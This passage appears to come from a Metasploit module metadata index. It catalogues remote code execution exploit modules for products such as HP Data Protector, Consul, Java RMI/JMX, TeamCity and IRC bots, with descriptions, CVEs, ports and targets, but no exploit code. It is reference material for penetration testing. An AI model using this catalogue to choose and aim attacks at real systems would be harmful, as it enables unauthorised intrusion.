"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/misc/arkeia_agent_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/arkeia_agent_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/batik_svg_java": {
"name": "Squiggle 1.7 SVG Browser Java Code Execution",
"full_name": "exploit/multi/misc/batik_svg_java",
"rank": 600,
"disclosure_date": "2012-05-11",
"type": "exploit",
"author": [
"Nicolas Gregoire",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the SVG support to execute Java Code in the\n Squiggle Browser included in the Batik framework 1.7 through a\n crafted SVG file referencing a jar file.\n\n In order to gain arbitrary code execution, the browser must meet\n the following conditions: (1) It must support at least SVG version\n 1.1 or newer, (2) It must support Java code and (3) The \"Enforce\n secure scripting\" check must be disabled.\n\n The module has been tested against Windows and Linux platforms.",
"references": [
"OSVDB-81965",
"URL-http://www.agarri.fr/blog/"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/batik_svg_java.rb",
"is_install_path": true,
"ref_name": "multi/misc/batik_svg_java",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/bmc_patrol_cmd_exec": {
"name": "BMC Patrol Agent Privilege Escalation Cmd Execution",
"full_name": "exploit/multi/misc/bmc_patrol_cmd_exec",
"rank": 600,
"disclosure_date": "2019-01-17",
"type": "exploit",
"author": [
"b0yd"
],
"description": "This module leverages the remote command execution feature provided by\n the BMC Patrol Agent software. It can also be used to escalate privileges\n on Windows hosts as the software runs as SYSTEM but only verifies that the password\n of the provided user is correct. This also means if the software is running on a\n domain controller, it can be used to escalate from a normal domain user to domain\n admin as SYSTEM on a DC is DA. **WARNING** The Windows version of this exploit uses\n powershell to execute the payload. The powershell version tends to time out on\n the first run so it may take multiple tries.",
"references": [
"CVE-2018-20735",
"URL-https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 3181,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Powershell Injected Shellcode",
"Generic Command Callback"
],
"mod_time": "2019-03-09 12:22:04 +0000",
"path": "/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/bmc_patrol_cmd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/misc/bmc_server_automation_rscd_nsh_rce": {
"name": "BMC Server Automation RSCD Agent NSH Remote Command Execution",
"full_name": "exploit/multi/misc/bmc_server_automation_rscd_nsh_rce",
"rank": 600,
"disclosure_date": "2016-03-16",
"type": "exploit",
"author": [
"Olga Yanushkevich, ERNW <@yaole0>",
"Nicky Bloor (@NickstaDB) <nick@nickbloor.co.uk>"
],
"description": "This module exploits a weak access control check in the BMC Server\n Automation RSCD agent that allows arbitrary operating system commands\n to be executed without authentication.\n Note: Under Windows, non-powershell commands may need to be prefixed\n with 'cmd /c'.",
"references": [
"URL-https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/",
"URL-https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/",
"URL-https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/",
"CVE-2016-1542",
"CVE-2016-1543"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 4750,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows/VBS Stager",
"Unix/Linux",
"Generic Command"
],
"mod_time": "2018-01-14 18:28:40 +0000",
"path": "/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/bmc_server_automation_rscd_nsh_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/claymore_dual_miner_remote_manager_rce": {
"name": "Nanopool Claymore Dual Miner APIs RCE",
"full_name": "exploit/multi/misc/claymore_dual_miner_remote_manager_rce",
"rank": 600,
"disclosure_date": "2018-02-09",
"type": "exploit",
"author": [
"reversebrain <reversebrain@snado>",
"phra <phra@snado>"
],
"description": "This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.",
"references": [
"EDB-44638",
"CVE-2018-1000049",
"URL-https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 3333,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target",
"Linux",
"Windows"
],
"mod_time": "2018-06-28 01:33:56 +0000",
"path": "/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/claymore_dual_miner_remote_manager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/consul_rexec_exec": {
"name": "Hashicorp Consul Remote Command Execution via Rexec",
"full_name": "exploit/multi/misc/consul_rexec_exec",
"rank": 600,
"disclosure_date": "2018-08-11",
"type": "exploit",
"author": [
"Bharadwaj Machiraju <bharadwaj.machiraju@gmail.com>",
"Francis Alexander <helofrancis@gmail.com>",
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits a feature of Hashicorp Consul named rexec.",
"references": [
"URL-https://www.consul.io/docs/agent/options.html#disable_remote_exec",
"URL-https://www.consul.io/docs/commands/exec.html",
"URL-https://github.com/torque59/Garfield"
],
"platform": "Linux",
"arch": "",
"rport": 8500,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2018-12-24 13:48:07 +0000",
"path": "/modules/exploits/multi/misc/consul_rexec_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/consul_rexec_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/consul_service_exec": {
"name": "Hashicorp Consul Remote Command Execution via Services API",
"full_name": "exploit/multi/misc/consul_service_exec",
"rank": 600,
"disclosure_date": "2018-08-11",
"type": "exploit",
"author": [
"Bharadwaj Machiraju <bharadwaj.machiraju@gmail.com>",
"Francis Alexander <helofrancis@gmail.com>",
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits Hashicorp Consul's services API to gain remote command\n execution on Consul nodes.",
"references": [
"URL-https://www.consul.io/api/agent/service.html",
"URL-https://github.com/torque59/Garfield"
],
"platform": "Linux",
"arch": "",
"rport": 8500,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2018-12-24 13:30:03 +0000",
"path": "/modules/exploits/multi/misc/consul_service_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/consul_service_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/erlang_cookie_rce": {
"name": "Erlang Port Mapper Daemon Cookie RCE",
"full_name": "exploit/multi/misc/erlang_cookie_rce",
"rank": 500,
"disclosure_date": "2009-11-20",
"type": "exploit",
"author": [
"Daniel Mende",
"Milton Valencia (wetw0rk)"
],
"description": "The erlang port mapper daemon is used to coordinate distributed erlang instances.\n Should an attacker obtain the authentication cookie, RCE is trivial. Usually, this\n cookie is named \".erlang.cookie\" and its location varies.",
"references": [
"URL-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/"
],
"platform": "",
"arch": "",
"rport": 25672,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Linux (CmdStager)",
"Windows",
"Windows (CmdStager)"
],
"mod_time": "2018-12-21 07:33:37 +0000",
"path": "/modules/exploits/multi/misc/erlang_cookie_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/erlang_cookie_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/hp_data_protector_exec_integutil": {
"name": "HP Data Protector EXEC_INTEGUTIL Remote Code Execution",
"full_name": "exploit/multi/misc/hp_data_protector_exec_integutil",
"rank": 500,
"disclosure_date": "2014-10-02",
"type": "exploit",
"author": [
"Aniway.Anyway <Aniway.Anyway@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists\n in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL\n request allows execution of arbitrary commands from a restricted directory. Since it\n includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute\n arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but\n an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP\n Data Protector for linux. This module has been tested successfully on HP Data Protector\n 9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.",
"references": [
"ZDI-14-344"
],
"platform": "",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux 64 bits / HP Data Protector 9",
"Windows 64 bits / HP Data Protector 9"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb",
"is_install_path": true,
"ref_name": "multi/misc/hp_data_protector_exec_integutil",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/hp_vsa_exec": {
"name": "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
"full_name": "exploit/multi/misc/hp_vsa_exec",
"rank": 600,
"disclosure_date": "2011-11-11",
"type": "exploit",
"author": [
"Nicolas Gregoire",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on\n versions prior to 9.5. By using a default account credential, it is possible\n to inject arbitrary commands as part of a ping request via port 13838.",
"references": [
"CVE-2012-4361",
"OSVDB-82087",
"EDB-18893",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086",
"URL-http://www.agarri.fr/blog/archives/2012/02/index.html"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 13838,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"HP VSA up to 8.5",
"HP VSA 9"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/hp_vsa_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/hp_vsa_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/indesign_server_soap": {
"name": "Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",
"full_name": "exploit/multi/misc/indesign_server_soap",
"rank": 600,
"disclosure_date": "2012-11-11",
"type": "exploit",
"author": [
"h0ng10",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"RunScript\" procedure provided by the SOAP interface of\n Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).\n\n The exploit drops the payload on the server and must be removed manually.",
"references": [
"OSVDB-87548",
"URL-http://secunia.com/advisories/48572/"
],
"platform": "OSX,Windows",
"arch": "",
"rport": 12345,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Indesign CS6 Server / Windows (64 bits)",
"Indesign CS6 Server / Mac OS X Snow Leopard 64 bits"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/misc/indesign_server_soap.rb",
"is_install_path": true,
"ref_name": "multi/misc/indesign_server_soap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/java_jdwp_debugger": {
"name": "Java Debug Wire Protocol Remote Code Execution",
"full_name": "exploit/multi/misc/java_jdwp_debugger",
"rank": 400,
"disclosure_date": "2010-03-12",
"type": "exploit",
"author": [
"Michael Schierl",
"Christophe Alladoum",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module abuses exposed Java Debug Wire Protocol services in order\n to execute arbitrary Java code remotely. It just abuses the protocol\n features, since no authentication is required if the service is enabled.",
"references": [
"OSVDB-96066",
"EDB-27179",
"URL-http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html",
"URL-https://seclists.org/nmap-dev/2010/q1/867",
"URL-https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java",
"URL-https://svn.nmap.org/nmap/scripts/jdwp-exec.nse",
"URL-http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html"
],
"platform": "Linux,OSX,Windows",
"arch": "armle, aarch64, x86, x64",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux (Native Payload)",
"OSX (Native Payload)",
"Windows (Native Payload)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/misc/java_jdwp_debugger.rb",
"is_install_path": true,
"ref_name": "multi/misc/java_jdwp_debugger",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/java_jmx_server": {
"name": "Java JMX Server Insecure Configuration Java Code Execution",
"full_name": "exploit/multi/misc/java_jmx_server",
"rank": 600,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Braden Thomas",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module takes advantage of an insecure Java JMX interface configuration, which would\n allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication\n disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while\n interfaces with authentication enabled will be vulnerable only if a weak configuration\n is deployed (allowing the use of javax.management.loading.MLet, having a security manager\n that allows loading a ClassLoader MBean, etc.).",
"references": [
"URL-https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf",
"URL-https://www.optiv.com/blog/exploiting-jmx-rmi",
"CVE-2015-2342"
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": [
999,
1090,
1098,
1099,
1100,
1101,
1102,
1103,
1129,
1030,
1035,
1199,
1234,
1440,
3273,
3333,
3900,
2199,
2809,
5520,
5580,
5521,
5999,
6060,
6789,
6996,
7700,
7800,
7878,
7890,
7801,
8050,
8051,
8085,
8091,
8205,
8303,
8642,
8701,
8686,
8888,
8889,
8890,
8901,
8902,
8903,
8999,
9001,
9003,
9004,
9005,
9050,
9090,
9099,
9300,
9500,
9711,
9809,
9810,
9811,
9812,
9813,
9814,
9815,
9875,
9910,
9991,
9999,
10001,
10162,
10098,
10099,
11001,
11099,
11333,
12000,
13013,
14000,
15000,
15001,
15200,
16000,
17200,
18980,
20000,
23791,
26256,
31099,
33000,
32913,
37718,
45230,
47001,
47002,
50050,
50500,
50501,
50502,
50503,
50504
],
"autofilter_services": [
"rmi",
"rmid",
"java-rmi",
"rmiregistry"
],
"targets": [
"Generic (Java Payload)"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/java_jmx_server.rb",
"is_install_path": true,
"ref_name": "multi/misc/java_jmx_server",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/java_rmi_server": {
"name": "Java RMI Server Insecure Default Configuration Java Code Execution",
"full_name": "exploit/multi/misc/java_rmi_server",
"rank": 600,
"disclosure_date": "2011-10-15",
"type": "exploit",
"author": [
"mihi"
],
"description": "This module takes advantage of the default configuration of the RMI Registry and\n RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n invokes a method in the RMI Distributed Garbage Collector which is available via every\n RMI endpoint, it can be used against both rmiregistry and rmid, and against most other\n (custom) RMI endpoints as well.\n\n Note that it does not work against Java Management Extension (JMX) ports since those do\n not support remote class loading, unless another RMI endpoint is active in the same\n Java process.\n\n RMI method calls do not support or require any sort of authentication.",
"references": [
"URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html",
"URL-http://www.securitytracker.com/id?1026215",
"CVE-2011-3556"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": 1099,
"autofilter_ports": [
999,
1090,
1098,
1099,
1100,
1101,
1102,
1103,
1129,
1030,
1035,
1199,
1234,
1440,
3273,
3333,
3900,
2199,
2809,
5520,
5580,
5521,
5999,
6060,
6789,
6996,
7700,
7800,
7878,
7890,
7801,
8050,
8051,
8085,
8091,
8205,
8303,
8642,
8701,
8686,
8888,
8889,
8890,
8901,
8902,
8903,
8999,
9001,
9003,
9004,
9005,
9050,
9090,
9099,
9300,
9500,
9711,
9809,
9810,
9811,
9812,
9813,
9814,
9815,
9875,
9910,
9991,
9999,
10001,
10162,
10098,
10099,
11001,
11099,
11333,
12000,
13013,
14000,
15000,
15001,
15200,
16000,
17200,
18980,
20000,
23791,
26256,
31099,
33000,
32913,
37718,
45230,
47001,
47002,
50050,
50500,
50501,
50502,
50503,
50504
],
"autofilter_services": [
"rmi",
"rmid",
"java-rmi",
"rmiregistry"
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/java_rmi_server.rb",
"is_install_path": true,
"ref_name": "multi/misc/java_rmi_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/legend_bot_exec": {
"name": "Legend Perl IRC Bot Remote Code Execution",
"full_name": "exploit/multi/misc/legend_bot_exec",
"rank": 600,
"disclosure_date": "2015-04-27",
"type": "exploit",
"author": [
"Jay Turla"
],
"description": "This module exploits a remote command execution on the Legend Perl IRC Bot.\n This bot has been used as a payload in the Shellshock spam campaign of October 2014.\n This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and\n UDP flooding, the ability to remove system logs, and ability to gain root, and\n VNC scanning.\n\n Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script\n to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.",
"references": [
"OSVDB-121681",
"EDB-36836",
"URL-https://www.damballa.com/perlbotnado/",
"URL-http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Legend IRC Bot"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/legend_bot_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/legend_bot_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/msf_rpc_console": {
"name": "Metasploit RPC Console Command Execution",
"full_name": "exploit/multi/misc/msf_rpc_console",
"rank": 600,
"disclosure_date": "2011-05-22",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module connects to a specified Metasploit RPC server and\n uses the 'console.write' procedure to execute operating\n system commands. Valid credentials are required to access the\n RPC interface.\n\n This module has been tested successfully on Metasploit 4.15\n on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit\n 4.14 on Windows 7 SP1.",
"references": [
"URL-https://help.rapid7.com/metasploit/Content/api/rpc/overview.html",
"URL-https://community.rapid7.com/docs/DOC-1516"
],
"platform": "Ruby,Unix,Windows",
"arch": "",
"rport": 55552,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ruby",
"Windows CMD",
"Unix CMD"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/misc/msf_rpc_console.rb",
"is_install_path": true,
"ref_name": "multi/misc/msf_rpc_console",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/misc/msfd_rce_remote": {
"name": "Metasploit msfd Remote Code Execution",
"full_name": "exploit/multi/misc/msfd_rce_remote",
"rank": 600,
"disclosure_date": "2018-04-11",
"type": "exploit",
"author": [
"Robin Stenvi <robin.stenvi@gmail.com>"
],
"description": "Metasploit's msfd-service makes it possible to get a msfconsole-like\n interface over a TCP socket. If this socket is accessible on a remote\n interface, an attacker can execute commands on the victim's machine.\n\n If msfd is running with higher privileges than the current local user,\n this module can also be used for privilege escalation. In that case,\n port forwarding on the compromised host can be used.\n\n Code execution is achieved with the msfconsole command: irb -e 'CODE'.",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": 55554,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-04-27 18:35:30 +0000",
"path": "/modules/exploits/multi/misc/msfd_rce_remote.rb",
"is_install_path": true,
"ref_name": "multi/misc/msfd_rce_remote",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/nodejs_v8_debugger": {
"name": "NodeJS Debugger Command Injection",
"full_name": "exploit/multi/misc/nodejs_v8_debugger",
"rank": 600,
"disclosure_date": "2016-08-15",
"type": "exploit",
"author": [
"Patrick Thomas <pst@coffeetocode.net>"
],
"description": "This module uses the \"evaluate\" request type of the NodeJS V8\n debugger protocol (version 1) to evaluate arbitrary JS and\n call out to other system commands. The port (default 5858) is\n not exposed non-locally in default configurations, but may be\n exposed either intentionally or via misconfiguration.",
"references": [
"URL-https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md",
"URL-https://github.com/nodejs/node/pull/8106"
],
"platform": "",
"arch": "",
"rport": 5858,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NodeJS"
],
"mod_time": "2017-09-10 11:23:52 +0000",
"path": "/modules/exploits/multi/misc/nodejs_v8_debugger.rb",
"is_install_path": true,
"ref_name": "multi/misc/nodejs_v8_debugger",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/openoffice_document_macro": {
"name": "Apache OpenOffice Text Document Malicious Macro Execution",
"full_name": "exploit/multi/misc/openoffice_document_macro",
"rank": 600,
"disclosure_date": "2017-02-08",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module generates an Apache OpenOffice Text Document with a malicious macro in it.\n To exploit successfully, the targeted user must adjust the security level in Macro\n Security to either Medium or Low. If set to Medium, a prompt is presented to the user\n to enable or disable the macro. If set to Low, the macro can automatically run without\n any warning.\n\n The module also works against LibreOffice.",
"references": [
"URL-https://en.wikipedia.org/wiki/Macro_virus"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apache OpenOffice on Windows (PSH)",
"Apache OpenOffice on Linux/OSX (Python)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/openoffice_document_macro.rb",
"is_install_path": true,
"ref_name": "multi/misc/openoffice_document_macro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/openview_omniback_exec": {
"name": "HP OpenView OmniBack II Command Execution",
"full_name": "exploit/multi/misc/openview_omniback_exec",
"rank": 600,
"disclosure_date": "2001-02-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module uses a vulnerability in the OpenView Omniback II\n service to execute arbitrary commands. This vulnerability was\n discovered by DiGiT and his code was used as the basis for this\n module.\n\n For Microsoft Windows targets, due to module limitations, use the\n \"unix/cmd/generic\" payload and set CMD to your command. You can only\n pass a small amount of characters (4) to the command line on Windows.",
"references": [
"CVE-2001-0311",
"OSVDB-6018",
"BID-11032",
"URL-http://www.securiteam.com/exploits/6M00O150KG.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/multi/misc/openview_omniback_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/openview_omniback_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/osgi_console_exec": {
"name": "Eclipse Equinoxe OSGi Console Command Execution",
"full_name": "exploit/multi/misc/osgi_console_exec",
"rank": 300,
"disclosure_date": "2018-02-13",
"type": "exploit",
"author": [
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits the Eclipse Equinoxe OSGi (Open Service Gateway initiative) console\n 'fork' command to execute arbitrary commands on the remote system.",
"references": [
"URL-https://www.eclipse.org/equinox/documents/quickstart-framework.php"
],
"platform": "Linux,Windows",
"arch": "armle, aarch64, x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux (Bash Payload)",
"Windows (Powershell Payload)"
],
"mod_time": "2018-02-17 20:11:05 +0000",
"path": "/modules/exploits/multi/misc/osgi_console_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/osgi_console_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/pbot_exec": {
"name": "PHP IRC Bot pbot eval() Remote Code Execution",
"full_name": "exploit/multi/misc/pbot_exec",
"rank": 600,
"disclosure_date": "2009-11-02",
"type": "exploit",
"author": [
"evilcry",
"Jay Turla",
"bwall",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module allows remote command execution on the PHP IRC bot pbot by abusing\n the usage of eval() in the implementation of the .php command. In order to work,\n the connection details for the IRC server and channel where pbot can be found must be provided.\n The module has been successfully tested on the version of pbot analyzed by Jay\n Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP\n SP3.",
"references": [
"OSVDB-84913",
"EDB-20168",
"URL-http://resources.infosecinstitute.com/pbot-analysis/"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"pbot"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/pbot_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/pbot_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/persistent_hpca_radexec_exec": {
"name": "HP Client Automation Command Injection",
"full_name": "exploit/multi/misc/persistent_hpca_radexec_exec",
"rank": 500,
"disclosure_date": "2014-01-02",
"type": "exploit",
"author": [
"Ben Turner",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in HP Client Automation, now distributed\n as Persistent Systems Client Automation. The vulnerability exists in the Notify\n Daemon (radexecd.exe), which doesn't authenticate execution requests by default.\n\n This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2\n and CentOS 5.",
"references": [
"CVE-2015-1497",
"ZDI-15-038",
"URL-https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 3465,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Client Automation 9.0.0 / Linux",
"HP Client Automation 9.0.0 / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/persistent_hpca_radexec_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/ra1nx_pubcall_exec": {
"name": "Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution",
"full_name": "exploit/multi/misc/ra1nx_pubcall_exec",
"rank": 500,
"disclosure_date": "2013-03-24",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module allows remote command execution on the PHP IRC bot Ra1NX by\n using the public call feature in private message to covertly bypass the\n authentication system.",
"references": [
"OSVDB-91663",
"URL-https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0",
"URL-http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ra1NX / Unix",
"Ra1NX / Windows"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/ra1nx_pubcall_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/teamcity_agent_xmlrpc_exec": {
"name": "TeamCity Agent XML-RPC Command Execution",
"full_name": "exploit/multi/misc/teamcity_agent_xmlrpc_exec",
"rank": 600,
"disclosure_date": "2015-04-14",
"type": "exploit",
"author": [
"Dylan Pindur <dylanpindur@gmail.com>"
],
"description": "This module allows remote code execution on TeamCity Agents configured\n to use bidirectional communication via xml-rpc. In bidirectional mode\n the TeamCity server pushes build commands to the Build Agents over port\n TCP/9090 without requiring authentication. Up until version 10 this was\n the default configuration. This module supports TeamCity agents from\n version 6.0 onwards.",
"references": [
"URL-https://www.tenable.com/plugins/nessus/94675"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
